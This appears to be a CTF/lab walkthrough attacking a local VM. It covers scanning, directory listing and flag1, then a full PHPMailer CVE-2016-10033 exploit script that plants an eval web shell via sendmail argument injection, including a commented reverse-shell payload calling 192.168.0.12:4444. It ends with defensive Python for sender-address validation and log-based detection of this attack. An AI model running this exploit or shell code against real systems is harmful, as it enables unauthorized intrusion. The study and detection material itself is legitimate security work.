After building the target VM, set all of its network adapters to NAT mode.
Look up the host IP.
Use Nmap to sweep for live hosts on the same subnet (I had scanned the wrong subnet, 192.168.0.0, earlier, which is why the scan found nothing):
nmap -sn 192.168.5.0/24
Target IP found:
Scan that IP address to find open ports and other service information.
Run a vulnerability scan with Xray.
Xray scan result:
http://192.168.5.144/.DS_Store
afrog reported the following:
An RCE vulnerability is very likely present.
Run another vulnerability scan with Xray:
xray_windows_amd64.exe webscan --basic-crawler http://192.168.5.144/ --html-output 2.html
Use Yujian (御剑) for directory scanning:
http://192.168.5.144/manual/en/index.html
http://192.168.5.144/css/
http://192.168.5.144/img/
http://192.168.5.144/vendor/?C=S;O=A
The Index of /vendor directory listing reveals the version and flag1:
5.2.16
/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
searchsploit shows that PHPMailer 5.2.18 has an RCE vulnerability.
This also matches what afrog reported.
Searching for PHPMailer 5.2.18 turns up its CVE number and the privilege escalation approach.
Run the EXP script to obtain the shell address:
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
# target = 'http://localhost:8080'
target = 'http://192.168.5.144/'
vuln = "/contact.php"
# backdoor = '/backdoor.php'
backdoor = '/shell.php'
# payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
payload = '<?php @eval($_REQUEST[777]);phpinfo();?>'
fields={'action': 'submit',
'name': payload,
# 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
'message': 'Pwned'}
m = MultipartEncoder(fields=fields,
boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
# headers={'User-Agent': 'curl/7.47.0',
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36',
'Content-Type': m.content_type}
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
# r = requests.post(target, data=m.to_string(),
r = requests.post(target + vuln, data=m.to_string(),
headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
# print('[+] ExPLoITeD ' + target)
print('[+] ExPLoITeD ' + target + backdoor)
http://192.168.5.144//shell.php  // shell address
Connect with AntSword (蚁剑).
Reverse shell ... did not come back ...
Stopped here ...
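The two things that made this box fall were a directory listing that leaked the PHPMailer version, and a contact form that passed the visitor-supplied sender address straight through to sendmail, so quotes and backslashes in the address let extra sendmail options ride along (CVE-2016-10033, fixed in PHPMailer 5.2.18 by tightening sender validation). The following is an added example, not code from the writeup, from PHPMailer or from any of the tools named above. It shows the defender's side of both steps in Python: a strict sender-address check of the kind a form handler should apply before anything reaches a mail transport, and a scan over constructed Apache-style access-log lines for the trail this writeup leaves (a `.DS_Store` fetch, a sortable directory-index request, and a POST to the contact form followed shortly by a 200 for a `.php` path that is not a known page). The log lines, the `KNOWN_PHP` set and the 60-second window are assumptions made for the example.

```python
import re
from datetime import datetime

# Only plain local-part@domain addresses pass. Quotes, backslashes, whitespace and
# option-like tokens, which the sendmail-argument injection relies on, are all rejected.
SAFE_EMAIL = re.compile(r'^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$')


def is_safe_sender(addr: str) -> bool:
    """True only for addresses that cannot smuggle arguments to a mail transport."""
    if len(addr) > 254:
        return False
    return SAFE_EMAIL.fullmatch(addr) is not None


# Apache combined-log style: ip ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# Assumption for the example: the site's legitimate PHP entry points.
KNOWN_PHP = {'/contact.php', '/index.php'}

# Constructed sample log (not captured from the target in the writeup).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /.DS_Store HTTP/1.1" 200 6148',
    '192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /vendor/?C=S;O=A HTTP/1.1" 200 1834',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "POST /contact.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:06 +0000] "GET //shell.php HTTP/1.1" 200 60000',
    '192.0.2.20 - - [01/Jan/2024:10:00:09 +0000] "POST /contact.php HTTP/1.1" 200 512',
    '192.0.2.20 - - [01/Jan/2024:10:00:10 +0000] "GET /index.php HTTP/1.1" 200 2048',
]


def parse_line(line: str):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return rec


def find_indicators(lines, window_s: int = 60):
    """Return (kind, ip, path) tuples for recon hits and suspicious new .php fetches."""
    findings = []
    last_contact_post = {}  # ip -> timestamp of its most recent POST /contact.php
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec['path']
        # Recon: macOS Finder metadata left in the web root, or an autoindex sort request
        if path.endswith('/.DS_Store') or re.search(r'\?C=[NMSD];O=[AD]', path):
            findings.append(('recon', rec['ip'], path))
        if rec['method'] == 'POST' and path.startswith('/contact.php'):
            last_contact_post[rec['ip']] = rec['ts']
        elif rec['method'] == 'GET' and path.endswith('.php') and rec['status'] == 200:
            norm = '/' + path.lstrip('/')  # collapse the leading // seen in the writeup
            seen = last_contact_post.get(rec['ip'])
            if (norm not in KNOWN_PHP and seen is not None
                    and (rec['ts'] - seen).total_seconds() <= window_s):
                findings.append(('new_php_after_contact_post', rec['ip'], norm))
    return findings


if __name__ == '__main__':
    for hit in find_indicators(SAMPLE_LOG):
        print(hit)
```

The sender check is deliberately an allow-list rather than a search for known bad substrings: the injected address in the script above would still be rejected if the option names changed, because the quote, backslash and spaces never match the pattern. The log scan keys on the order of events per client rather than on any single request, since a lone `GET /index.php` after a form submission is normal traffic.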